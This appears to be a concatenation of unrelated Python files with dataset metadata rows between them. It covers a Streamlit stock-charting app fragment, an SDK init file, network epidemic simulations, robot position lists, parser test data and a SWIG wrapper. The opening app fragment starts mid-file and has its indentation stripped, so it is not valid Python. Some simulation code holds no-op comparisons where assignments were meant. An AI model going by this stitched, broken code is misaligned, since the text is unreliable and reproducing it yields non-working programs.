data['Symbol'][0] = temp_select
st.table(data)
with st.expander('Show Options'):
col3, col4 = st.columns(2)
col5, col6 = st.columns(2)
with col3 :
interval_list = ["1 Day", "1 Week", "1 Month"]
interval_list2_dict = {"1 Day" : "DAILY", "1 Week" : "WEEKLY", "1 Month" : "MONTHLY"}
interval_list21_dict = {"1 Day" : "Daily", "1 Week" : "Weekly", "1 Month" : "Monthly"}
indicator_dict = {"1 Minute" : "1min", "5 Minutes" : "5min", "15 Minutes" : "15min",
"30 Minutes" : "30min",
"60 Minutes" : "60min", "1 Day" : "daily", "1 Week" : "weekly",
"1 Month" : "monthly"}
interval_select = st.selectbox("Select Interval", interval_list)
with col4 :
graph_type = st.selectbox('Select Graph type', graph_type_list)
flag = 0
try :
y_arr = ['Rate']
data = None
if flag == 0 :
data = rs.get("https://www.alphavantage.co/query?function=TIME_SERIES_" + interval_list2_dict[
interval_select] + "&symbol=" + str(
input_value) + "&outputsize=" + size_select + "&apikey=" + random.choice(api_list))
# data=rs.get('https://www.alphavantage.co/query?function=DAILY&symbol=RELIANCE.BSE&outputsize=full&apikey=demo')
data = data.json()
data = json.dumps(data["Time Series (" + str(interval_list21_dict[interval_select]) + ")"])
data = pd.read_json(data)
data = data.T.reset_index()
data.rename(columns={'4. close' : 'Rate'}, inplace=True)
data.rename(columns={'1. open' : 'Open'}, inplace=True)
data.rename(columns={'2. high' : 'High'}, inplace=True)
data.rename(columns={'3. low' : 'Low'}, inplace=True)
if graph_type != 'Filled Area' :
with col5 :
indicate_select = st.multiselect('Add Indicators', indicator_symbol_list)
interval_sel = indicate_select
with col6 :
time_select = st.number_input('Select indicator time period', max_value=30, min_value=5,
step=1)
for i in range(len(interval_sel)) :
data2 = rs.get(
"https://www.alphavantage.co/query?function=" + interval_sel[i] + "&symbol=" + str(
input_value) + "&interval=" + indicator_dict[
interval_select] + "&time_period=" + str(
time_select) + "&series_type=open&outputsize=" + size_select + "&apikey=" + random.choice(
api_list))
data2 = data2.json()
data2 = json.dumps(data2["Technical Analysis: " + interval_sel[i]])
data2 = pd.read_json(data2)
data2 = data2.T.reset_index()
data = pd.merge(data, data2, on="index", how="left")
y_arr = y_arr + interval_sel
st.markdown(
"<h1 style='text-align: center; color: red;'>Chart of " + crypto_select1 + " <sub style='font-size: 25px;'>" + temp_select + "/" + currency_select1 + "</sub></h1>",
unsafe_allow_html=True)
# fig = px.line(data, x="index", y=y_arr, template="ggplot2", labels={"index" : "Date"})
if graph_type == 'Line' :
fig = make_subplots(specs=[[{"secondary_y" : True}]])
fig.add_trace(go.Scatter(x=data['index'], y=data['Rate'], name='Rate'),
secondary_y=True)
for i in range(len(interval_sel)) :
fig.add_trace(
go.Scatter(x=data['index'], y=data[interval_sel[i]], name=interval_sel[i]),
secondary_y=True)
fig.add_trace(go.Bar(x=data['index'], y=data['5. volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators",
font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Candlesticks' or graph_type == 'OHLC' :
data.rename(columns={'Rate' : 'Close'}, inplace=True)
fig = make_subplots(specs=[[{"secondary_y" : True}]])
# include candlestick with rangeselector
if graph_type == 'Candlesticks' :
fig.add_trace(go.Candlestick(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
if graph_type == 'OHLC' :
fig.add_trace(go.Ohlc(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
for i in range(len(interval_sel)) :
fig.add_trace(
go.Scatter(x=data['index'], y=data[interval_sel[i]], name=interval_sel[i]),
secondary_y=True)
# include a go.Bar trace for volumes
fig.add_trace(go.Bar(x=data['index'], y=data['5. volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators",
font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Filled Area' :
fig = px.area(data, x='index', y='Rate', template="ggplot2", labels={"index" : "Date"})
fig.update_layout(autosize=False, width=1600, height=500, legend_title="Indicators",
font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
st.plotly_chart(fig)
except Exception as e :
st.info(
"The selected financial entity data is currently unavailable please check your connection or choose another name")
except MyError as err :
st.info(err.value)
else:
st.info('Here only Bombay Stock Exchange(BSE/BS) is supported for National Stock Exchange(NSE/NS) select "Global stocks and more(Yahoo Finance)" option from sidebar ')
if radio_select == "Global stocks and more(Yahoo Finance)" :
st.title(radio_select)
keyword = st.text_input("Search by Symbol/Ticker")
sym_but = st.button('Click here to search for supported symbols')
if sym_but :
webbrowser.open('https://finance.yahoo.com/screener/new')
if keyword != '' :
ticker = yf.Ticker(keyword)
try :
if ticker.info['sector'] :
function_list = ['Information', 'Chart', 'Dividend and Stock Splits', 'Financials', 'Major Holders',
'Institutional Holders', 'Balance sheet', 'Recommendations', 'Cashflow', 'Earnings']
function_select = st.selectbox('Select the function', function_list)
st.write(" ")
if function_select == 'Chart' :
with st.expander('Show Options'):
col3, col4 = st.columns(2)
col5, col6 = st.columns(2)
with col3 :
interval_list = ["1 Day", "1 Week",
"1 Month"]
interval_list2_dict = {"1 Day" : "1d", "1 Week" : "1wk", "1 Month" : "1mo"}
interval_select = st.selectbox("Select Interval", interval_list)
with col4 :
graph_type = st.selectbox('Select Graph type', graph_type_list)
with col5 :
start_date = st.date_input("Start date", datetime.date(2021, 1, 10))
with col6 :
end_date = st.date_input("End date", datetime.date(2022, 2, 10))
st.markdown(
"<h1 style='text-align: center; color: red;'>Chart of " + str(
ticker.info['longName']) + " <sub style='font-size: 25px;'>" +
str(ticker.info['symbol']) + "/" + str(ticker.info['financialCurrency']) + "</sub></h1>",
unsafe_allow_html=True)
data = yf.download(keyword, start=start_date, end=end_date,
interval=interval_list2_dict[interval_select])
data = data.reset_index()
if graph_type == 'Candlesticks' or graph_type == 'OHLC':
fig = make_subplots(specs=[[{"secondary_y" : True}]])
# include candlestick with rangeselector
if graph_type=='Candlesticks':
fig.add_trace(go.Candlestick(x=data['Date'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
if graph_type=='OHLC':
fig.add_trace(go.Ohlc(x=data['Date'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
# include a go.Bar trace for volumes
fig.add_trace(go.Bar(x=data['Date'], y=data['Volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Filled Area' :
data.rename(columns={'Close' : 'Rate'}, inplace=True)
fig = px.area(data, x='Date', y='Rate', template="ggplot2", )
fig.update_layout(autosize=False, width=1600, height=500, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
st.plotly_chart(fig)
if graph_type == 'Line' :
data.rename(columns={'Close' : 'Rate'}, inplace=True)
fig = make_subplots(specs=[[{"secondary_y" : True}]])
fig.add_trace(go.Scatter(x=data['Date'], y=data['Rate'], name='Rate'),
secondary_y=True)
fig.add_trace(go.Bar(x=data['Date'], y=data['Volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if function_select == 'Information' :
info = ticker.info
if info['logo_url'] != '' :
string_logo = '<img src=%s>' % info['logo_url']
st.markdown(string_logo, unsafe_allow_html=True)
string_name = info['longName']
st.title('**%s**' % string_name)
try :
st.info(info["longBusinessSummary"])
except :
pass
st.title('Basic Details ')
try :
st.markdown('<div style="color:green"><b >ZIP : </b>' + info['zip'] + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown(
'<div style="color:green"><b >Full Time Employees : </b>' + str(
info['fullTimeEmployees']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Sector : </b>' + info['sector'] + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Industry : </b>' + info['industry'] + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Address : </b>' + info['address1'] + ',' + info[
'address2'] + '</div>',
unsafe_allow_html=True)
except :
try :
st.markdown('<div style="color:green"><b >Address : </b>' + info['address1'] + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >City : </b>' + info['city'] + '</div>',
unsafe_allow_html=True)
except :
pass
st.markdown('<div style="color:green"><b >Country : </b>' + info['country'] + '</div>',
unsafe_allow_html=True)
try :
st.markdown('<div style="color:green"><b >Phone : </b>' + str(info['phone']) + '</div>',
unsafe_allow_html=True)
except :
pass
try:
st.markdown('<div style="color:green"><b >Website : </b><a href="' + str(info['website']) + '">' + str(info['website']) + '</a></div>',
unsafe_allow_html=True)
except:
pass
st.title('Share Details')
try :
st.markdown('<div style="color:green"><b >Exchange : </b>' + info['exchange'] + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Symbol : </b>' + info['symbol'] + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown(
'<div style="color:green"><b >Currency : </b>' + info['financialCurrency'] + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Type : </b>' + info['quoteType'] + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown(
'<div style="color:green"><b >Total Cash : </b>' + str(info['totalCash']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown(
'<div style="color:green"><b >Total Debt : </b>' + str(info['totalDebt']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown(
'<div style="color:green"><b >Total Revenue : </b>' + str(info['totalRevenue']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown(
'<div style="color:green"><b >Market Cap : </b>' + str(info['marketCap']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Total Cash Per Share : </b>' + str(
info['totalCashPerShare']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Revenue Per Share : </b>' + str(
info['revenuePerShare']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Shares Outstanding : </b>' + str(
info['sharesOutstanding']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Target Low : </b>' + str(
info['targetLowPrice']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Target High : </b>' + str(
info['targetHighPrice']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Recommendation : </b>' + str(
info['recommendationKey']) + '</div>',
unsafe_allow_html=True)
except :
pass
st.title('Advance Details')
try :
st.markdown('<div style="color:green"><b >Operating Margins : </b>' + str(
info['operatingMargins']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Profit Margins : </b>' + str(
info['profitMargins']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Shares Outstanding : </b>' + str(
info['grossMargins']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Gross Profits : </b>' + str(
info['grossProfits']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Revenue Growth : </b>' + str(
info['revenueGrowth']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Earnings Growth : </b>' + str(
info['earningsGrowth']) + '</div>',
unsafe_allow_html=True)
except :
pass
if function_select == 'Dividend and Stock Splits' :
try:
st.table(ticker.actions.reset_index())
except:
st.info("This function information is not available for selected Symbol")
if function_select == 'Financials' :
try:
st.table(ticker.financials.reset_index())
except:
st.info("This function information is not available for selected Symbol")
if function_select == 'Major Holders' :
try:
st.table(ticker.major_holders)
except:
st.info("This function information is not available for selected Symbol")
if function_select == 'Institutional Holders' :
try:
st.table(ticker.institutional_holders)
except:
st.info("This function information is not available for selected Symbol")
if function_select == 'Balance sheet' :
try:
st.table(ticker.balance_sheet.reset_index())
except:
st.info("This function information is not available for selected Symbol")
if function_select == 'Recommendations' :
try:
st.table(ticker.recommendations.reset_index())
except:
st.info("This function information is not available for selected Symbol")
if function_select == 'Cashflow' :
try:
st.table(ticker.cashflow.reset_index())
except:
st.info("This function information is not available for selected Symbol")
if function_select == 'Earnings' :
try:
st.table(ticker.earnings.reset_index())
except:
st.info("This function information is not available for selected Symbol")
except Exception as e :
st.warning('Either there is connection error or symbol/ticker is not found in our system')
st.write(e)
else:
st.info('For Indian stocks only National Stock Exchange(NSE/NS) is supported for Bombay Stock Exchange(BSE/BS) select "Indian Stocks" option from sidebar ')
st.write('')
st.warning('In case of any error try clicking rerun button on top left after 1 minute')
| 52.08705 | 203 | 0.455394 | 6,885 | 72,401 | 4.657662 | 0.062745 | 0.018523 | 0.029687 | 0.016621 | 0.891325 | 0.879787 | 0.86987 | 0.863197 | 0.852688 | 0.836441 | 0 | 0.019064 | 0.421859 | 72,401 | 1,389 | 204 | 52.12455 | 0.74705 | 0.020884 | 0 | 0.829636 | 0 | 0.001775 | 0.189571 | 0.013872 | 0 | 0 | 0 | 0 | 0 | 1 | 0.001775 | false | 0.025732 | 0.011535 | 0.000887 | 0.015084 | 0.00976 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6da5c8cc0ffdfa861a24bc846c65da715a73fd26 | 345 | py | Python | bitmovin_api_sdk/encoding/encodings/muxings/fmp4/drm/widevine/__init__.py | jaythecaesarean/bitmovin-api-sdk-python | 48166511fcb9082041c552ace55a9b66cc59b794 | [
"MIT"
] | 11 | 2019-07-03T10:41:16.000Z | 2022-02-25T21:48:06.000Z | bitmovin_api_sdk/encoding/encodings/muxings/fmp4/drm/widevine/__init__.py | jaythecaesarean/bitmovin-api-sdk-python | 48166511fcb9082041c552ace55a9b66cc59b794 | [
"MIT"
] | 8 | 2019-11-23T00:01:25.000Z | 2021-04-29T12:30:31.000Z | bitmovin_api_sdk/encoding/encodings/muxings/fmp4/drm/widevine/__init__.py | jaythecaesarean/bitmovin-api-sdk-python | 48166511fcb9082041c552ace55a9b66cc59b794 | [
"MIT"
] | 13 | 2020-01-02T14:58:18.000Z | 2022-03-26T12:10:30.000Z | from bitmovin_api_sdk.encoding.encodings.muxings.fmp4.drm.widevine.widevine_api import WidevineApi
from bitmovin_api_sdk.encoding.encodings.muxings.fmp4.drm.widevine.customdata.customdata_api import CustomdataApi
from bitmovin_api_sdk.encoding.encodings.muxings.fmp4.drm.widevine.widevine_drm_list_query_params import WidevineDrmListQueryParams
| 86.25 | 131 | 0.901449 | 46 | 345 | 6.5 | 0.391304 | 0.120401 | 0.150502 | 0.180602 | 0.625418 | 0.625418 | 0.625418 | 0.625418 | 0.625418 | 0.625418 | 0 | 0.009009 | 0.034783 | 345 | 3 | 132 | 115 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
09dfb504c6fcd0b0cec955bffca8a4a1702f6e82 | 7,614 | py | Python | Simulations/simulations.py | nwlandry/time-dependent-infectiousness | 7a0e958836958b440cc8162463c07a023cbcb860 | [
"BSD-3-Clause"
] | 1 | 2021-12-20T20:20:48.000Z | 2021-12-20T20:20:48.000Z | Simulations/simulations.py | nwlandry/time-dependent-infectiousness | 7a0e958836958b440cc8162463c07a023cbcb860 | [
"BSD-3-Clause"
] | null | null | null | Simulations/simulations.py | nwlandry/time-dependent-infectiousness | 7a0e958836958b440cc8162463c07a023cbcb860 | [
"BSD-3-Clause"
] | null | null | null | from collections import defaultdict
import numpy as np
import random
def SIR_model_static_network(G, gamma, beta, dt=1, initial_infecteds=None, tmin=0, tmax=np.inf):
state = defaultdict( lambda : "S" )
new_state = state.copy()
for infected in initial_infecteds:
state[infected] = 'I'
n = G.number_of_nodes()
t = tmin
times = [tmin]
I = [len(initial_infecteds)]
S = [n - I[0]]
R = [0]
while t < tmax and I[-1] != 0:
S.append(S[-1])
I.append(I[-1])
R.append(R[-1])
for node in G.nodes:
if state[node] == "I":
# heal
if random.random() <= gamma*dt:
new_state[node] = "R"
R[-1] += 1
I[-1] += -1
else:
new_state[node] = "I"
elif state[node] == "S":
# infect by neighbors
for nbr in G.neighbors(node):
if state[nbr] == "I" and random.random() <= beta*dt:
new_state[node] = "I"
S[-1] += -1
I[-1] += 1
break
else:
new_state[node] == "S"
state = new_state.copy()
t += dt
times.append(t)
return np.array(times), np.array(S), np.array(I), np.array(R)
def SIR_model_temporal_network(Glist, n, gamma, beta, dt=1, initial_infecteds=None, tmin=0, tmax=np.inf):
state = defaultdict( lambda : "S" )
new_state = state.copy()
for infected in initial_infecteds:
state[infected] = 'I'
t = tmin
times = [tmin]
I = [len(initial_infecteds)]
S = [n - I[0]]
R = [0]
index = 0
while t < tmax and I[-1] != 0 and index < len(Glist):
S.append(S[-1])
I.append(I[-1])
R.append(R[-1])
G = Glist[index]
for node in G.nodes:
if state[node] == "I":
# heal
if random.random() <= gamma*dt:
new_state[node] = "R"
R[-1] += 1
I[-1] += -1
else:
new_state[node] = "I"
elif state[node] == "S":
# infect by neighbors
for nbr in G.neighbors(node):
if state[nbr] == "I" and random.random() <= beta*dt:
new_state[node] = "I"
S[-1] += -1
I[-1] += 1
break
else:
new_state[node] == "S"
state = new_state.copy()
t += dt
times.append(t)
index += 1
return np.array(times), np.array(S), np.array(I), np.array(R)
def VL_model_static_network(G, beta, tauR, dt=1, initial_infecteds=None, tmin=0, tmax=np.inf, return_infection_distribution=False):
infected_time = dict()
state = defaultdict( lambda : "S" )
new_state = state.copy()
for infected in initial_infecteds:
state[infected] = 'I'
infected_time[infected] = tmin
n = G.number_of_nodes()
t = tmin
times = [tmin]
I = [len(initial_infecteds)]
S = [n - I[0]]
R = [0]
if return_infection_distribution:
infection_distribution = np.zeros((round((tmax - tmin)/dt)+1, round(max(tauR)/dt)+1))
infection_distribution[0, 0] = I[-1]
while t < tmax and I[-1] != 0:
S.append(S[-1])
I.append(I[-1])
R.append(R[-1])
for node in G.nodes:
if state[node] == "I":
# heal
if t - infected_time[node] >= tauR[node]:
new_state[node] = "R"
R[-1] += 1
I[-1] += -1
else:
new_state[node] = "I"
elif state[node] == "S":
# infect by neighbors
for nbr in G.neighbors(node):
if state[nbr] == "I" and random.random() <= beta[node](t - infected_time[nbr])*dt:
new_state[node] = "I"
infected_time[node] = t + dt
S[-1] += -1
I[-1] += 1
break
else:
new_state[node] == "S"
state = new_state.copy()
t += dt
times.append(t)
if return_infection_distribution:
for node in state:
if state[node] == "I":
try:
infection_distribution[round((t - tmin)/dt), round((t - infected_time[node])/dt)] += 1
except:
pass
if return_infection_distribution:
return np.array(times), np.array(S), np.array(I), np.array(R), infection_distribution
else:
return np.array(times), np.array(S), np.array(I), np.array(R)
def VL_model_temporal_network(Glist, n, beta, tauR, dt=1, initial_infecteds=None, tmin=0, tmax=np.inf, return_infection_distribution=False):
infected_time = dict()
state = defaultdict( lambda : "S" )
new_state = state.copy()
for infected in initial_infecteds:
state[infected] = 'I'
infected_time[infected] = tmin
t = tmin
times = [tmin]
I = [len(initial_infecteds)]
S = [n - I[0]]
R = [0]
index = 0
if return_infection_distribution:
infection_distribution = np.zeros((min(round((tmax - tmin)/dt)+1, len(Glist)+1), round(max(tauR)/dt)+1))
infection_distribution[index, 0] = I[-1]
while t < tmax and I[-1] != 0 and index < len(Glist):
S.append(S[-1])
I.append(I[-1])
R.append(R[-1])
G = Glist[index]
for node in G.nodes:
if state[node] == "I":
# heal
if t - infected_time[node] >= tauR[node]:
new_state[node] = "R"
R[-1] += 1
I[-1] += -1
else:
new_state[node] = "I"
elif state[node] == "S":
# infect by neighbors
for nbr in G.neighbors(node):
if state[nbr] == "I" and random.random() <= beta[node](t - infected_time[nbr])*dt:
new_state[node] = "I"
infected_time[node] = t + dt
S[-1] += -1
I[-1] += 1
break
else:
new_state[node] == "S"
state = new_state.copy()
t += dt
times.append(t)
index += 1
if return_infection_distribution:
for node in state:
if state[node] == "I":
try:
infection_distribution[index, round((t - infected_time[node])/dt)] += 1
except:
pass
if return_infection_distribution:
return np.array(times), np.array(S), np.array(I), np.array(R), infection_distribution
else:
return np.array(times), np.array(S), np.array(I), np.array(R)
def generatePowerLawDegreeSequence(n, minDegree, maxDegree, exponent):
degrees = np.round(invCDFPowerLaw(np.random.rand(n), minDegree, maxDegree, exponent)).astype(int)
if sum(degrees) % 2 != 0:
degrees[random.randrange(n)] += 1
return degrees
def invCDFPowerLaw(u, minDegree, maxDegree, exponent):
return (minDegree**(1-exponent) + u*(maxDegree**(1-exponent) - minDegree**(1-exponent)))**(1/(1-exponent)) | 33.104348 | 140 | 0.470186 | 914 | 7,614 | 3.820569 | 0.095186 | 0.06701 | 0.054983 | 0.009164 | 0.875716 | 0.853379 | 0.853379 | 0.853379 | 0.832188 | 0.799542 | 0 | 0.01997 | 0.39493 | 7,614 | 230 | 141 | 33.104348 | 0.738007 | 0.013002 | 0 | 0.894737 | 0 | 0 | 0.005062 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031579 | false | 0.010526 | 0.015789 | 0.005263 | 0.089474 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
110c15ec60852e53fdb5afbffb3f6f8b490703c8 | 96 | py | Python | src/pytest_springfield/__init__.py | thevarunjain/springfield | 884b56895e4399f3a7aea05848ac7e6d5e6a2f90 | [
"BSD-3-Clause"
] | null | null | null | src/pytest_springfield/__init__.py | thevarunjain/springfield | 884b56895e4399f3a7aea05848ac7e6d5e6a2f90 | [
"BSD-3-Clause"
] | 22 | 2015-05-01T20:51:21.000Z | 2019-05-08T16:25:10.000Z | src/pytest_springfield/__init__.py | thevarunjain/springfield | 884b56895e4399f3a7aea05848ac7e6d5e6a2f90 | [
"BSD-3-Clause"
] | 5 | 2015-06-11T19:32:40.000Z | 2019-05-03T15:45:19.000Z | from __future__ import absolute_import
from .assertrepr_compare import pytest_assertrepr_compare | 48 | 57 | 0.916667 | 12 | 96 | 6.666667 | 0.583333 | 0.425 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.072917 | 96 | 2 | 57 | 48 | 0.898876 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1114b8c2e03d426159dab1aa54e90bc73fdc5188 | 450 | py | Python | positions.py | filesmuggler/ts2020_manipulator | 6e499404d33dd2d366d90d757531f5d39798cf9f | [
"MIT"
] | 2 | 2020-05-12T18:02:11.000Z | 2020-06-30T21:52:39.000Z | positions.py | filesmuggler/ts2020_manipulator | 6e499404d33dd2d366d90d757531f5d39798cf9f | [
"MIT"
] | 1 | 2020-06-30T19:52:49.000Z | 2020-06-30T19:52:49.000Z | positions.py | filesmuggler/ts2020_manipulator | 6e499404d33dd2d366d90d757531f5d39798cf9f | [
"MIT"
] | null | null | null | start = [90.0, 30.0, 30.0, 0.0, 0.0, 0.0]
scan = [90.0, 90.0, 0.0, 0.0, 0.0, 0.0]
grip = [90.0, 120.0, 30.0, 0.0, 0.0, 0.0]
evaluate = [90.0, 120.0, -30.0, 0.0, 0.0, 0.0]
trash = [-90.0, 120.0, 30.0, 0.0, 0.0, 0.0]
transport_a = [180.0, 120.0, 30.0, 0.0, 0.0, 0.0]
transport_b = [0.0, 120.0, 30.0, 0.0, 0.0, 0.0]
detach = [-90.0, 140.0, 20.0, 0.0, 0.0, 0.0]
detach_a = [180.0, 140.0, 20.0, 0.0, 0.0, 0.0]
detach_b = [0.0, 140.0, 20.0, 0.0, 0.0, 0.0] | 45 | 49 | 0.504444 | 134 | 450 | 1.664179 | 0.119403 | 0.573991 | 0.699552 | 0.753363 | 0.775785 | 0.775785 | 0.775785 | 0.775785 | 0.70852 | 0.663677 | 0 | 0.424324 | 0.177778 | 450 | 10 | 50 | 45 | 0.178378 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
1123e896e22be413aa506294c4329abf372ab4ec | 87 | py | Python | ast/testdata/func_oneline.py | MaxTurchin/pycopy-lib | d7a69fc2a28031e2ca475c29239f715c1809d8cc | [
"PSF-2.0"
] | 126 | 2019-07-19T14:42:41.000Z | 2022-03-21T22:22:19.000Z | ast/testdata/func_oneline.py | MaxTurchin/pycopy-lib | d7a69fc2a28031e2ca475c29239f715c1809d8cc | [
"PSF-2.0"
] | 38 | 2019-08-28T01:46:31.000Z | 2022-03-17T05:46:51.000Z | ast/testdata/func_oneline.py | MaxTurchin/pycopy-lib | d7a69fc2a28031e2ca475c29239f715c1809d8cc | [
"PSF-2.0"
] | 55 | 2019-08-02T09:32:33.000Z | 2021-12-22T11:25:51.000Z | def foo(): pass
def foo(): pass;
def foo(): pass; pass
def foo(): pass; pass;
| 17.4 | 25 | 0.551724 | 14 | 87 | 3.428571 | 0.214286 | 0.5 | 0.833333 | 0.875 | 1 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0.264368 | 87 | 4 | 26 | 21.75 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | true | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 10 |
112d0fabaa78dec70e19fd24087cac6d90371dcd | 17,822 | py | Python | SimModel_Python_API/simmodel_swig/Release/SimSpatialZone_ThermalZone_Default.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | 3 | 2016-05-30T15:12:16.000Z | 2022-03-22T08:11:13.000Z | SimModel_Python_API/simmodel_swig/Release/SimSpatialZone_ThermalZone_Default.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | 21 | 2016-06-13T11:33:45.000Z | 2017-05-23T09:46:52.000Z | SimModel_Python_API/simmodel_swig/Release/SimSpatialZone_ThermalZone_Default.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | null | null | null | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.7
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_SimSpatialZone_ThermalZone_Default', [dirname(__file__)])
except ImportError:
import _SimSpatialZone_ThermalZone_Default
return _SimSpatialZone_ThermalZone_Default
if fp is not None:
try:
_mod = imp.load_module('_SimSpatialZone_ThermalZone_Default', fp, pathname, description)
finally:
fp.close()
return _mod
_SimSpatialZone_ThermalZone_Default = swig_import_helper()
del swig_import_helper
else:
import _SimSpatialZone_ThermalZone_Default
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
